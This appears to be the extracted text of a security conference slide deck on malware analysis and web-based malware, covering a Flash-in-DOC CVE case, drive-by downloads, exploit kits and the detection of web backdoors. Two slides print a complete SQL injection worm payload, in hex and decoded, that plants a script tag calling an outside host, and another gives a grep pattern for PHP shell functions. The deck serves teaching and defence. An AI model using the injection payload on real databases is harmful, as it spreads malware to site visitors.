1. www.cdicconference.com
“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”
ชำแหละโปรแกรมไม่พงประสงค์ ด้วยเทคนิคเหนือเมฆ
ึ
อ. ประธาน พงศ์ทิพย์ฤกษ์
SANS GIAC GPEN, eCPPT, ECSA, CEH, CPTS, CIW Security Analyst, CWNA, CWSP, Security+, ITIL-F
Section Manager, Senior Information Security Consultant
ACIS Professional Center
1

2. Let’s Party Rock
 Next Generation for Malware
 Malware Analysis
 Web Based Malware
 Back to the Past
 Back to the Future
 Lab Challenge
2 2

3. www.cdicconference.com
“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”
Next Generation of Malware
3

4. Old Malware fashion
 Executable file
 Packer, Crypter => FUD just 1 Week !!
 Spyware / Adware
 Rogue Security Software
 Virus / Worm
 USB Autorun
4 4

5. Antivirus Detected
Gotcha !!
5 5

6. Virustotal
6 6

7. Virustotal – One Week later
7 7

8. Anubis: Analyzing Binary File
8 8

9. Latest Malware fashion
 MS Office+Flash Player
 PDF Reader
 Mobile Application
 Social Network Application
 Web Browser Toolbar
 Web based Malware
9 9

10. Bypassing Antivirus
Ninja Techniques
10 10

11. Malware Analysis
11 11

12. CVE-2012-0754: SWF in DOC
 “Iran’s Oil and Nuclear Situation.doc”
 Contains flash instructing it to download and
Parse a malformed MP4.
 OS Affect
 Adobe Flash Player before 10.3.183.15 and 11.x
Before 11.1.102.62 on Windows, Mac OS X, Linux
And Solaris
 Mobile Affect
 Adobe Flash Player before 11.1.111.6 on
Android 2.x and 3.x and before 11.1.115.6 on
Android 4.x
12 12

13. Document Analysis
 Decompiled Flash from file
 This.MyNS.play(“http://208.115.230.76/test.mp4”);
 Whois – 208.115.230.76
 208.115.230.76
76-230-115-208.static.reverse.lstn.net
Host reachable, 77 ms. average, 2 of 4 pings lost
208.115.192.0 - 208.115.255.255
Limestone Networks, Inc.
400 S. Akard Street
Suite 200
Dallas
TX
75202
United States
13 13

14. Process Monitor network log
14 14

15. Process Monitor network log
15 15

16. Traffic and C&C (us.exe)
16 16

17. Virus Analysis – us.exe
17 17

18. Target Analysis
 Whois – 199.192.156.134
 199.192.156.134
Host reachable, 89 ms. average
199.192.152.0 - 199.192.159.255
VPS21 LTD
38958 S FREMONT BLVD
FREMONT
CA
94536
United States
zou, jinhe
+1-408-205-7550
18 18

19. www.cdicconference.com
“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”
Web Based Malware
19

20. Back to the Past
20 20

21. Web Defacement
21 21

22. Zone-H
22 22

23. Ddos Tool
23 23

24. Hack 4 Fun and Profit
24 24

25. Back to the Future
25 25

26. About My Memory
 2008
 Oishi website was hacked without defacement
 Kaspersky AV alert for “A little javascript file”
 2009
 SQL injection worms on MSSQL
 Affect many Bank on Thailand
 2010
 Google and Firefox alert for malware website
 Obfuscation JS to bypass AV
 2011
 Many website was blocked by Google Malware
26 26

27. SQL Injection Worms
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043
004C004100520045002000400054002000760061007200630068006100720
0280032003500350029002C00400043002000760061007200630068006100
72002800320035003500290020004400450043004C0041005200450020005
400610062006C0065005F0043007500720073006F00720020004300550052
0053004F005200200046004F0052002000730065006C00650063007400200
061002E006E0061006D0065002C0062002E006E0061006D00650020006600
72006F006D0020007300790073006F0062006A00650063007400730020006
1002C0073007900730063006F006C0075006D006E00730020006200200077
006800650072006500200061002E00690064003D0062002E0069006400200
061006E006400200061002E00780074007900700065003D00270075002700
200061006E0064002000280062002E00780074007900700065003D0039003
90020006F007200200062002E00780074007900700065003D003300350020
006F007200200062002E00780074007900700065003D00320033003100200
06F007200200062002E00780074007900700065003D003100AS%20NVARC
HAR(4000));EXEC(@S);--
27 27

28. SQL Injection Worms
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(D E C L A R E
@T varchar(255),@C varchar(255) DECLARE T
able_Cursor CURSOR FOR select a.name,b.nam
e from sysobjects a,syscolumns b where a.id
=b.id and a.xtype='u' and (b.xtype=99 or b.x
type=35 or b.xtype=231 or b.xtype=167) OPE
N Table_Cursor FETCH NEXT FROM Table_Cur
sor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=r
trim(convert(varchar,['+@C+']))+''<script sr
c=http://www.fengnima.cn/k.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor DEALLOCATE Table_C
u r s o r undefined AS%20NVARCHAR(4000));EXEC(@S);--
28 28

29. Web Application Backdoor
29 29

30. Web Application Backdoor -
FUD
30 30

31. Redbull.php (PHP Backdoor)
31 31

32. Insert Malicious JS into
config.inc.php
32 32

33. Crimepack Exploit Kit
33 33

34. Crimeware Exploit Kit
34 34

35. Drive-By Download
Visit Malicious Website
Malicious JS execute
Web Server
Redirect to Malware Server
Exploit Browser / Flash Player
Reverse Shell to Attacker
Malware Server
35 34

36. Google Malware Alert
36 35

37. Google Diagnostic
37 36

38. http://www.stopbadware.org/hom
e/reviewinfo
38 37

39. http://sitecheck.sucuri.net/scanner
39 38

40. http://sucuri.net/malware/malwar
e-entry-mwhta7
40 39

41. http://sucuri.net/malware/malwar
e-entry-mwhta7
41 40

42. http://www.urlvoid.com
42 41

43. Detect Webserver Backdoor
 Manual Source review
 NeoPI – Neohapsis
 PHP Shell Scanner
 http://25yearsofprogramming.com/php/findmaliciouscode.htm
 grep -RPl --include=*.{php,txt,asp}
"(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdi
r|fopen|fclose|readfile) *(”
/var/www/
43 42

44. PHP Shell Scanner
44 43

45. Undetectable #1
45 44

46. Undetectable #2
46 45

47. JS De-Obfuscate Tool
 Google Chrome Developer Tools
 Firebug (Firefox’s plugin)
 JSDebug (Firefox’s plugin)
 Javascript Deobfuscator (Firefox’s plugin)
 Malzilla
 Rhino
 SpiderMonkey
47 46

48. Simple JS Obfuscate
48 47

49. Simple JS Obfuscate
49 48

50. www.cdicconference.com
“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”
Lab Challenge
50

51. Be Safe
www.cdicconference.com
51 50